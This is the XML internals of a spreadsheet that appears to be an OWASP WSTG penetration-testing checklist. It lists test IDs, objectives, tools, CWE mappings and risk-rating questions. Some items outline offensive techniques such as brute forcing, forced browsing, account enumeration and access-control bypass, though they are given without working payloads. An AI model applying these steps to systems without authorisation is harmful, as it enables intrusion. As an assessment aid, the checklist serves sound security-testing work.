    <definedName name="SkillRequired">#REF!</definedName>
    <definedName name="sss" localSheetId="0">#REF!</definedName>
    <definedName name="sss" localSheetId="9">#REF!</definedName>
    <definedName name="sss" localSheetId="10">#REF!</definedName>
    <definedName name="sss" localSheetId="11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13">#REF!</definedName>
    <definedName name="sss">#REF!</definedName>
    <definedName name="sssde" localSheetId="0">#REF!</definedName>
    <definedName name="sssde" localSheetId="9">#REF!</definedName>
    <definedName name="sssde" localSheetId="10">#REF!</definedName>
    <definedName name="sssde" localSheetId="11">#REF!</definedName>
    <definedName name="sssde" localSheetId="1">#REF!</definedName>
    <definedName name="sssde" localSheetId="2">#REF!</definedName>
    <definedName name="sssde" localSheetId="3">#REF!</definedName>
    <definedName name="sssde" localSheetId="4">#REF!</definedName>
    <definedName name="sssde" localSheetId="5">#REF!</definedName>
    <definedName name="sssde" localSheetId="6">#REF!</definedName>
    <definedName name="sssde" localSheetId="7">#REF!</definedName>
    <definedName name="sssde" localSheetId="8">#REF!</definedName>
    <definedName name="sssde" localSheetId="13">#REF!</definedName>
    <definedName name="sssde">#REF!</definedName>
    <definedName name="t" localSheetId="0">#REF!</definedName>
    <definedName name="t" localSheetId="9">#REF!</definedName>
    <definedName name="t" localSheetId="10">#REF!</definedName>
    <definedName name="t" localSheetId="11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13">#REF!</definedName>
    <definedName name="t">#REF!</definedName>
    <definedName name="Temp" localSheetId="0">#REF!</definedName>
    <definedName name="Temp" localSheetId="9">#REF!</definedName>
    <definedName name="Temp" localSheetId="10">#REF!</definedName>
    <definedName name="Temp" localSheetId="11">#REF!</definedName>
    <definedName name="Temp" localSheetId="1">#REF!</definedName>
    <definedName name="Temp" localSheetId="2">#REF!</definedName>
    <definedName name="Temp" localSheetId="3">#REF!</definedName>
    <definedName name="Temp" localSheetId="4">#REF!</definedName>
    <definedName name="Temp" localSheetId="5">#REF!</definedName>
    <definedName name="Temp" localSheetId="6">#REF!</definedName>
    <definedName name="Temp" localSheetId="7">#REF!</definedName>
    <definedName name="Temp" localSheetId="8">#REF!</definedName>
    <definedName name="Temp" localSheetId="13">#REF!</definedName>
    <definedName name="Temp">#REF!</definedName>
    <definedName name="URL">[2]Dashboard!$D$14</definedName>
    <definedName name="weree" localSheetId="0">#REF!</definedName>
    <definedName name="weree" localSheetId="9">#REF!</definedName>
    <definedName name="weree" localSheetId="10">#REF!</definedName>
    <definedName name="weree" localSheetId="11">#REF!</definedName>
    <definedName name="weree" localSheetId="1">#REF!</definedName>
    <definedName name="weree" localSheetId="2">#REF!</definedName>
    <definedName name="weree" localSheetId="3">#REF!</definedName>
    <definedName name="weree" localSheetId="4">#REF!</definedName>
    <definedName name="weree" localSheetId="5">#REF!</definedName>
    <definedName name="weree" localSheetId="6">#REF!</definedName>
    <definedName name="weree" localSheetId="7">#REF!</definedName>
    <definedName name="weree" localSheetId="8">#REF!</definedName>
    <definedName name="weree" localSheetId="13">#REF!</definedName>
    <definedName name="weree">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="0">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="9">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="10">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="11">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="1">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="2">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="3">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="4">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="5">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="6">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="7">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="8">#REF!</definedName>
    <definedName name="ytujkyufad" localSheetId="13">#REF!</definedName>
    <definedName name="ytujkyufad">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="0">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="9">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="10">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="11">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="1">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="2">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="3">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="4">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="5">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="6">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="7">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="8">#REF!</definedName>
    <definedName name="yuiyui" localSheetId="13">#REF!</definedName>
    <definedName name="yuiyui">#REF!</definedName>
    <definedName name="yuyut" localSheetId="0">#REF!</definedName>
    <definedName name="yuyut" localSheetId="9">#REF!</definedName>
    <definedName name="yuyut" localSheetId="10">#REF!</definedName>
    <definedName name="yuyut" localSheetId="11">#REF!</definedName>
    <definedName name="yuyut" localSheetId="1">#REF!</definedName>
    <definedName name="yuyut" localSheetId="2">#REF!</definedName>
    <definedName name="yuyut" localSheetId="3">#REF!</definedName>
    <definedName name="yuyut" localSheetId="4">#REF!</definedName>
    <definedName name="yuyut" localSheetId="5">#REF!</definedName>
    <definedName name="yuyut" localSheetId="6">#REF!</definedName>
    <definedName name="yuyut" localSheetId="7">#REF!</definedName>
    <definedName name="yuyut" localSheetId="8">#REF!</definedName>
    <definedName name="yuyut" localSheetId="13">#REF!</definedName>
    <definedName name="yuyu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0" roundtripDataSignature="AMtx7mjYCsdFXSIqyPOngGk5X9vfM5kRDA=="/>
    </ext>
  </extLst>
</workbook>
</file>

<file path=xl/calcChain.xml><?xml version="1.0" encoding="utf-8"?>
<calcChain xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">
  <c r="H14" i="20" l="1"/>
  <c r="E14" i="20"/>
  <c r="H13" i="20"/>
  <c r="E13" i="20"/>
  <c r="H12" i="20"/>
  <c r="E12" i="20"/>
  <c r="H11" i="20"/>
  <c r="E11" i="20"/>
  <c r="H8" i="20"/>
  <c r="E8" i="20"/>
  <c r="H7" i="20"/>
  <c r="E7" i="20"/>
  <c r="H6" i="20"/>
  <c r="E6" i="20"/>
  <c r="H5" i="20"/>
  <c r="E5" i="20"/>
  <c r="C6" i="3"/>
  <c r="G16" i="20" l="1"/>
  <c r="D23" i="20" s="1"/>
  <c r="B16" i="20"/>
  <c r="B23" i="20" l="1"/>
  <c r="C23" i="20"/>
  <c r="B24" i="20"/>
  <c r="D20" i="20"/>
  <c r="A25" i="20"/>
  <c r="C25" i="20"/>
  <c r="C24" i="20"/>
  <c r="B26" i="20"/>
  <c r="C26" i="20"/>
  <c r="D25" i="20"/>
  <c r="D24" i="20"/>
  <c r="A24" i="20"/>
  <c r="D26" i="20"/>
  <c r="A26" i="20"/>
  <c r="B25" i="20"/>
  <c r="C17" i="9"/>
  <c r="C15" i="9"/>
  <c r="C5" i="17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14" i="12"/>
  <c r="C13" i="12"/>
  <c r="C12" i="12"/>
  <c r="C11" i="12"/>
  <c r="C10" i="12"/>
  <c r="C9" i="12"/>
  <c r="C8" i="12"/>
  <c r="C7" i="12"/>
  <c r="C6" i="12"/>
  <c r="C5" i="12"/>
  <c r="C8" i="11"/>
  <c r="C7" i="11"/>
  <c r="C6" i="11"/>
  <c r="C5" i="11"/>
  <c r="C6" i="10"/>
  <c r="C5" i="10"/>
  <c r="C24" i="9"/>
  <c r="C23" i="9"/>
  <c r="C22" i="9"/>
  <c r="C21" i="9"/>
  <c r="C20" i="9"/>
  <c r="C19" i="9"/>
  <c r="C18" i="9"/>
  <c r="C16" i="9"/>
  <c r="C14" i="9"/>
  <c r="C13" i="9"/>
  <c r="C12" i="9"/>
  <c r="C11" i="9"/>
  <c r="C10" i="9"/>
  <c r="C9" i="9"/>
  <c r="C8" i="9"/>
  <c r="C7" i="9"/>
  <c r="C6" i="9"/>
  <c r="C5" i="9"/>
  <c r="C14" i="8"/>
  <c r="C13" i="8"/>
  <c r="C12" i="8"/>
  <c r="C11" i="8"/>
  <c r="C10" i="8"/>
  <c r="C9" i="8"/>
  <c r="C8" i="8"/>
  <c r="C7" i="8"/>
  <c r="C6" i="8"/>
  <c r="C5" i="8"/>
  <c r="C9" i="7"/>
  <c r="C8" i="7"/>
  <c r="C7" i="7"/>
  <c r="C6" i="7"/>
  <c r="C5" i="7"/>
  <c r="C15" i="6"/>
  <c r="C14" i="6"/>
  <c r="C13" i="6"/>
  <c r="C12" i="6"/>
  <c r="C11" i="6"/>
  <c r="C10" i="6"/>
  <c r="C9" i="6"/>
  <c r="C8" i="6"/>
  <c r="C7" i="6"/>
  <c r="C6" i="6"/>
  <c r="C5" i="6"/>
  <c r="C9" i="5"/>
  <c r="C8" i="5"/>
  <c r="C7" i="5"/>
  <c r="C6" i="5"/>
  <c r="C5" i="5"/>
  <c r="C14" i="3"/>
  <c r="C13" i="3"/>
  <c r="C12" i="3"/>
  <c r="C11" i="3"/>
  <c r="C10" i="3"/>
  <c r="C9" i="3"/>
  <c r="C8" i="3"/>
  <c r="C7" i="3"/>
  <c r="C5" i="3"/>
  <c r="C17" i="4"/>
  <c r="C16" i="4"/>
  <c r="C15" i="4"/>
  <c r="C14" i="4"/>
  <c r="C13" i="4"/>
  <c r="C12" i="4"/>
  <c r="C11" i="4"/>
  <c r="C10" i="4"/>
  <c r="C9" i="4"/>
  <c r="C8" i="4"/>
  <c r="C7" i="4"/>
  <c r="C6" i="4"/>
  <c r="C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its02</author>
    <author>pphongthiproek</author>
  </authors>
  <commentList>
    <comment ref="A5" authorId="0" shapeId="0" xr:uid="{E283A2CD-E4E6-5A4A-A217-0E26FDF141A4}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t xml:space="preserve">How technically skilled is this group of threat agents? </t>
        </r>
      </text>
    </comment>
    <comment ref="F5" authorId="1" shapeId="0" xr:uid="{4F5E9C11-107B-9047-AC2D-B2F42FE445D0}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much data could be disclosed and how sensitive is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="A6" authorId="0" shapeId="0" xr:uid="{F8E1DE38-B306-004C-86CB-7F947115F72C}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How motivated is this group of threat agents to find and exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F6" authorId="1" shapeId="0" xr:uid="{D7E56CE1-35E1-D346-B083-B45D0CD594F2}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much data could be corrupted and how damaged is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="A7" authorId="1" shapeId="0" xr:uid="{AEC80EAA-9BE3-1D48-A093-4E426EEBF009}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>What resources and opportunities are required for this group of threat agents to find and exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F7" authorId="1" shapeId="0" xr:uid="{36D9B535-F18F-CA4A-B114-DA62FBE37563}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much service could be lost and how vital is it?</t>
        </r>
      </text>
    </comment>
    <comment ref="A8" authorId="1" shapeId="0" xr:uid="{E8860BFF-FCD0-AD43-A39F-518225DD0724}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How large is this group of threat agents?</t>
        </r>
      </text>
    </comment>
    <comment ref="F8" authorId="1" shapeId="0" xr:uid="{009420E4-2CB7-9841-8ECA-54813341B1A9}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Are the threat agents' actions traceable to an individual?</t>
        </r>
      </text>
    </comment>
    <comment ref="A11" authorId="1" shapeId="0" xr:uid="{2506B8B1-AE67-4F4E-ABD2-30D0D85474CB}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How easy is it for this group of threat agents to discover this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F11" authorId="1" shapeId="0" xr:uid="{DDB67CB7-6B8F-3341-9FA7-F064A7E14C13}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much financial damage will result from an exploit?</t>
        </r>
      </text>
    </comment>
    <comment ref="A12" authorId="1" shapeId="0" xr:uid="{36B6AB97-0EC2-1548-9BEF-B42C79D0C56A}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How easy is it for this group of threat agents to actually exploit this vulnerability?</t>
        </r>
      </text>
    </comment>
    <comment ref="F12" authorId="1" shapeId="0" xr:uid="{B3B88D8B-F5E5-3343-8090-0685BEFAE38A}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>Would an exploit result in reputation damage that would harm the business?</t>
        </r>
      </text>
    </comment>
    <comment ref="A13" authorId="1" shapeId="0" xr:uid="{4E098A2C-13DC-E444-9CF4-11C7B3829666}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How well known is this vulnerability to this group of threat agents?</t>
        </r>
      </text>
    </comment>
    <comment ref="F13" authorId="1" shapeId="0" xr:uid="{2A17A8FA-415A-5C49-8D46-6F834E47FC76}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much exposure does non-compliance introduce?</t>
        </r>
      </text>
    </comment>
    <comment ref="A14" authorId="1" shapeId="0" xr:uid="{30157D94-7B1A-2D4D-B5FA-BC6B9DB662DF}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color indexed="81"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How likely is an exploit to be detected?</t>
        </r>
      </text>
    </comment>
    <comment ref="F14" authorId="1" shapeId="0" xr:uid="{C1D0FB5A-C847-1F42-89A3-9DABF68289F4}">
      <text>
        <r>
          <rPr>
            <b/>
            <sz val="9"/>
            <color rgb="FF000000"/>
            <rFont val="Tahoma"/>
            <family val="2"/>
          </rPr>
          <t>How much personally identifiable information could be disclosed?</t>
        </r>
      </text>
    </comment>
  </commentList>
</comments>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1302" uniqueCount="757">
  <si>
    <t>1. Information Gathering</t>
  </si>
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>WSTG-ID</t>
  </si>
  <si>
    <t>Test Name</t>
  </si>
  <si>
    <t>Objectives</t>
  </si>
  <si>
    <t>Tools</t>
  </si>
  <si>
    <t>OWASP Top 10</t>
  </si>
  <si>
    <t>CWE</t>
  </si>
  <si>
    <t>Result</t>
  </si>
  <si>
    <t>Affected Item</t>
  </si>
  <si>
    <t>Status</t>
  </si>
  <si>
    <t>1.1</t>
  </si>
  <si>
    <t>WSTG-INFO-01</t>
  </si>
  <si>
    <t>- Identify what sensitive design and configuration information of the application, system, or organization is exposed directly (on the organization's website) or indirectly (via third-party services).</t>
  </si>
  <si>
    <t>Google Hacking
Shodan
Recon-ng</t>
  </si>
  <si>
    <t>NA</t>
  </si>
  <si>
    <t>Not started</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>WSTG-INFO-02</t>
  </si>
  <si>
    <t>- Determine the version and type of a running web server to enable further discovery of any known vulnerabilities.</t>
  </si>
  <si>
    <t>Wappalyzer
Nikto</t>
  </si>
  <si>
    <t>A5
A6</t>
  </si>
  <si>
    <t>CWE-756
CWE-1352</t>
  </si>
  <si>
    <t>1.3</t>
  </si>
  <si>
    <t>WSTG-INFO-03</t>
  </si>
  <si>
    <t>- Identify hidden or obfuscated paths and functionality through the analysis of metadata files (robots.txt, &lt;META&gt; tag, sitemap.xml)
- Extract and map other information that could lead to a better understanding of the systems at hand.</t>
  </si>
  <si>
    <t>Browser
Curl
Burpsuite/ZAP</t>
  </si>
  <si>
    <t>A1</t>
  </si>
  <si>
    <t>CWE-200</t>
  </si>
  <si>
    <t>1.4</t>
  </si>
  <si>
    <t>WSTG-INFO-04</t>
  </si>
  <si>
    <t>- Enumerate the applications within the scope that exist on a web server.
- Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers</t>
  </si>
  <si>
    <t>dnsrecon
Nmap</t>
  </si>
  <si>
    <t>1.5</t>
  </si>
  <si>
    <t>WSTG-INFO-05</t>
  </si>
  <si>
    <t>- Review webpage comments, metadata, and redirect bodies to find any information leakage.
- Gather JavaScript files and review the JS code to better understand the application and to find any information leakage.
- Identify if source map files or other front-end debug files exist.</t>
  </si>
  <si>
    <t>CWE-200
CWE-540</t>
  </si>
  <si>
    <t>1.6</t>
  </si>
  <si>
    <t>WSTG-INFO-06</t>
  </si>
  <si>
    <t>- Identify possible entry and injection points through request and response analysis which covers hidden fields, parameters, methods HTTP header analysis</t>
  </si>
  <si>
    <t>OWASP ASD
Burpsuite/ZAP</t>
  </si>
  <si>
    <t>1.7</t>
  </si>
  <si>
    <t>WSTG-INFO-07</t>
  </si>
  <si>
    <t>- Map the target application and understand the principal workflows.
- Use HTTP(s) Proxy Spider/Crawler feature aligned with application walkthrough</t>
  </si>
  <si>
    <t>Burpsuite/ZAP</t>
  </si>
  <si>
    <t>1.8</t>
  </si>
  <si>
    <t>WSTG-INFO-08</t>
  </si>
  <si>
    <t>- Fingerprint the components being used by the web applications.
- Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders, Error message.</t>
  </si>
  <si>
    <t>Whatweb
Wappalyzer
CMSMap</t>
  </si>
  <si>
    <t>CWE-756
CWE-1104</t>
  </si>
  <si>
    <t>1.9</t>
  </si>
  <si>
    <t>WSTG-INFO-09</t>
  </si>
  <si>
    <t>N/A, This content has been merged into: WSTG-INFO-08</t>
  </si>
  <si>
    <t>1.10</t>
  </si>
  <si>
    <t>WSTG-INFO-10</t>
  </si>
  <si>
    <t>- Understand the architecture of the application and the technologies in use.
- Identify application architecture whether on Application and Network components:
Applicaton: Web server, CMS, PaaS, Serverless, Microservices, Static storage, Third party services/APIs
Network and Security: Reverse proxy, IPS, WAF</t>
  </si>
  <si>
    <t>WAFW00F
Nmap</t>
  </si>
  <si>
    <t>Symbol</t>
  </si>
  <si>
    <t>Pass</t>
  </si>
  <si>
    <t>Issue</t>
  </si>
  <si>
    <t>N/A</t>
  </si>
  <si>
    <t>2. Configuration and Deploy Management Testing</t>
  </si>
  <si>
    <t>Description</t>
  </si>
  <si>
    <t>2.1</t>
  </si>
  <si>
    <t>WSTG-CONF-01</t>
  </si>
  <si>
    <t>- Review the applications' configurations set across the network and validate that they are not vulnerable.
- Validate that used frameworks and systems are secure and not susceptible to known vulnerabilities due to unmaintained software or default settings and credentials.</t>
  </si>
  <si>
    <t>Nessus
Nmap</t>
  </si>
  <si>
    <t>A1
A5
A6</t>
  </si>
  <si>
    <t>CWE-284
CWE-1349
CWE-1352</t>
  </si>
  <si>
    <t>2.2</t>
  </si>
  <si>
    <t>WSTG-CONF-02</t>
  </si>
  <si>
    <t>- Ensure that defaults and known files have been removed.
- Review configuration and server handling (40*, 50*)
- Validate that no debugging code or extensions are left in the production environments.
- Review the logging mechanisms set in place for the application including Log Location, Log Storage , Log Rotation, Log Access Control, Log Review</t>
  </si>
  <si>
    <t>Browser
Nikto
CIS Benchmarks</t>
  </si>
  <si>
    <t>A1
A5
A9</t>
  </si>
  <si>
    <t>CWE-13
CWE-117
CWE-223
CWE-200
CWE-201
CWE-489
CWE-532
CWE-548
CWE-651
CWE-778</t>
  </si>
  <si>
    <t>2.3</t>
  </si>
  <si>
    <t>WSTG-CONF-03</t>
  </si>
  <si>
    <t>- Dirbust sensitive file extensions, or extensions that might contain raw data (*e.g.* scripts, raw data, credentials, etc.).
- Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)
- Validate that no system framework bypasses exist on the rules set.</t>
  </si>
  <si>
    <t>Browser
Nikto
DirSearch
ffuf</t>
  </si>
  <si>
    <t>CWE-200
CWE-425
CWE-552</t>
  </si>
  <si>
    <t>2.4</t>
  </si>
  <si>
    <t>WSTG-CONF-04</t>
  </si>
  <si>
    <t>- Find and analyse unreferenced files that might contain sensitive information.
- Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename</t>
  </si>
  <si>
    <t>CWE-200
CWE-531
CWE-538</t>
  </si>
  <si>
    <t>2.5</t>
  </si>
  <si>
    <t>WSTG-CONF-05</t>
  </si>
  <si>
    <t>- Identify hidden administrator interfaces and functionality.
- Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
DirSearch
ffuf</t>
  </si>
  <si>
    <t>A1
A4</t>
  </si>
  <si>
    <t>CWE-284
CWE-419</t>
  </si>
  <si>
    <t>2.6</t>
  </si>
  <si>
    <t>WSTG-CONF-06</t>
  </si>
  <si>
    <t>- Enumerate supported HTTP methods using OPTIONS
- Test for access control bypass (GET-&gt;HEAD-&gt;FOO)
- Test HTTP method overriding techniques.</t>
  </si>
  <si>
    <t>netcat
curl</t>
  </si>
  <si>
    <t>A5</t>
  </si>
  <si>
    <t>CWE-650
CWE-749</t>
  </si>
  <si>
    <t>2.7</t>
  </si>
  <si>
    <t>WSTG-CONF-07</t>
  </si>
  <si>
    <t>- Review the HSTS header and its validity.
- Identify HSTS header on Web server through HTTP response header:
curl -s -D- https://domain.com/ | grep Strict</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
curl</t>
  </si>
  <si>
    <t>CWE-523</t>
  </si>
  <si>
    <t>2.8</t>
  </si>
  <si>
    <t>WSTG-CONF-08</t>
  </si>
  <si>
    <t>Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.</t>
  </si>
  <si>
    <t>CWE-942</t>
  </si>
  <si>
    <t>2.9</t>
  </si>
  <si>
    <t>WSTG-CONF-09</t>
  </si>
  <si>
    <t>- Review and Identify any rogue file permissions.
- Identify configuration file whose permissions are set to world-readable from the installation by default.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Nikto</t>
  </si>
  <si>
    <t>A1
A5</t>
  </si>
  <si>
    <t>CWE-552
CWE-732</t>
  </si>
  <si>
    <t>2.10</t>
  </si>
  <si>
    <t>WSTG-CONF-10</t>
  </si>
  <si>
    <t>- Enumerate all possible domains (previous and current).
- Identify forgotten or misconfigured domains.</t>
  </si>
  <si>
    <t>Dnsrecon</t>
  </si>
  <si>
    <t>CWE-673</t>
  </si>
  <si>
    <t>2.11</t>
  </si>
  <si>
    <t>WSTG-CONF-11</t>
  </si>
  <si>
    <t>- Assess that the access control configuration for the storage services is properly in place.</t>
  </si>
  <si>
    <t>AWS CLI
S3Scanner</t>
  </si>
  <si>
    <t>CWE-264</t>
  </si>
  <si>
    <t>2.12</t>
  </si>
  <si>
    <t>WSTG-CONF-12</t>
  </si>
  <si>
    <t>- Review the Content-Security-Policy header or meta element to identify misconfigurations.</t>
  </si>
  <si>
    <t>Burpsuite CSP Auditor</t>
  </si>
  <si>
    <t>CWE-1021</t>
  </si>
  <si>
    <t>2.13</t>
  </si>
  <si>
    <t>WSTG-CONF-13</t>
  </si>
  <si>
    <t>- Make sure application paths are configured correctly.</t>
  </si>
  <si>
    <t>CWE-436</t>
  </si>
  <si>
    <t>3. Identity Management Testing</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>WSTG-IDNT-01</t>
  </si>
  <si>
    <t>- Identify and document roles used by the application.
- Attempt to switch, change, or access another role.
- Review the granularity of the roles and the needs behind the permissions given.</t>
  </si>
  <si>
    <t>A4</t>
  </si>
  <si>
    <t>CWE-266
CWE-269</t>
  </si>
  <si>
    <t>3.2</t>
  </si>
  <si>
    <t>WSTG-IDNT-02</t>
  </si>
  <si>
    <t>- Verify that the identity requirements for user registration are aligned with business and security requirements.
- Validate the registration process.</t>
  </si>
  <si>
    <t>CWE-419</t>
  </si>
  <si>
    <t>3.3</t>
  </si>
  <si>
    <t>WSTG-IDNT-03</t>
  </si>
  <si>
    <t>- Verify which accounts may provision other accounts and of what type.</t>
  </si>
  <si>
    <t>CWE-269
CWE-280</t>
  </si>
  <si>
    <t>3.4</t>
  </si>
  <si>
    <t>WSTG-IDNT-04</t>
  </si>
  <si>
    <t>- Review processes that pertain to user identification (*e.g.* registration, login, etc.).
- Enumerate users where possible through response analysis.</t>
  </si>
  <si>
    <t>A7</t>
  </si>
  <si>
    <t>CWE-204</t>
  </si>
  <si>
    <t>3.5</t>
  </si>
  <si>
    <t>WSTG-IDNT-05</t>
  </si>
  <si>
    <t>- Determine whether a consistent account name structure renders the application vulnerable to account enumeration.
- User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.
- Determine whether the application's error messages permit account enumeration.</t>
  </si>
  <si>
    <t>4. Authentication Testing</t>
  </si>
  <si>
    <t>4.1</t>
  </si>
  <si>
    <t>WSTG-ATHN-01</t>
  </si>
  <si>
    <t>N/A, This content has been merged into: WSTG-CRYP-03</t>
  </si>
  <si>
    <t>4.2</t>
  </si>
  <si>
    <t>WSTG-ATHN-02</t>
  </si>
  <si>
    <t>- Determine whether the application has any User accounts with default passwords.</t>
  </si>
  <si>
    <t>Browser
Burpsuite/ZAP
Hydra</t>
  </si>
  <si>
    <t>CWE-1392</t>
  </si>
  <si>
    <t>4.3</t>
  </si>
  <si>
    <t>WSTG-ATHN-03</t>
  </si>
  <si>
    <t>- Evaluate the account lockout mechanism's ability to mitigate brute force password guessing.
- Evaluate the unlock mechanism's resistance to unauthorized account unlocking.</t>
  </si>
  <si>
    <t>CWE-307</t>
  </si>
  <si>
    <t>4.4</t>
  </si>
  <si>
    <t>WSTG-ATHN-04</t>
  </si>
  <si>
    <t>- Ensure that authentication is applied across all services that require it.
- Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection</t>
  </si>
  <si>
    <t>A1
A7</t>
  </si>
  <si>
    <t>CWE-287
CWE-288
CWE-290
CWE-294
CWE-302
CWE-304
CWE-306
CWE-425
CWE-804</t>
  </si>
  <si>
    <t>4.5</t>
  </si>
  <si>
    <t>WSTG-ATHN-05</t>
  </si>
  <si>
    <t>- Validate that the generated session is managed securely and do not put the user's credentials in danger  (e.g., cookie)
- Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?</t>
  </si>
  <si>
    <t>A4
A5</t>
  </si>
  <si>
    <t>CWE-315
CWE-522
CWE-524</t>
  </si>
  <si>
    <t>4.6</t>
  </si>
  <si>
    <t>WSTG-ATHN-06</t>
  </si>
  <si>
    <t>- Review if the application stores sensitive information on the client-side.
- Review if access can occur without authorization.
- Check browser history issue by clicking "Back" button after logging out.
- Check browser cache issue from HTTP response headers (Cache-Control: no-cache)</t>
  </si>
  <si>
    <t>Browser
Burpsuite/ZAP</t>
  </si>
  <si>
    <t>CWE-525</t>
  </si>
  <si>
    <t>4.7</t>
  </si>
  <si>
    <t>WSTG-ATHN-07</t>
  </si>
  <si>
    <t>- Determine the resistance of the application against brute Force password guessing using available password dictionaries by evaluating the length, complexity, reuse, and aging requirements of passwords.
- Review whether new User accounts are created with weak or predictable passwords.</t>
  </si>
  <si>
    <t>Burpsuite/ZAP
Hydra</t>
  </si>
  <si>
    <t>CWE-521
CWE-1391</t>
  </si>
  <si>
    <t>4.8</t>
  </si>
  <si>
    <t>WSTG-ATHN-08</t>
  </si>
  <si>
    <t>- Determine the complexity and how straight-forward the questions are (Weak pre-generated questions, Weak self-generated question)
- Assess possible user answers and brute force capabilities.</t>
  </si>
  <si>
    <t>CWE-640</t>
  </si>
  <si>
    <t>4.9</t>
  </si>
  <si>
    <t>WSTG-ATHN-09</t>
  </si>
  <si>
    <t>- Determine whether the password change and reset functionality allows accounts to be compromised.
- Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?)
- Test password change (Need old password?)</t>
  </si>
  <si>
    <t>CWE-620
CWE-640</t>
  </si>
  <si>
    <t>4.10</t>
  </si>
  <si>
    <t>WSTG-ATHN-10</t>
  </si>
  <si>
    <t>- Identify alternative authentication channels.
- Assess the security measures used and if any bypasses exists on the alternative channels.</t>
  </si>
  <si>
    <t>CWE-288</t>
  </si>
  <si>
    <t>4.11</t>
  </si>
  <si>
    <t>WSTG-ATHN-11</t>
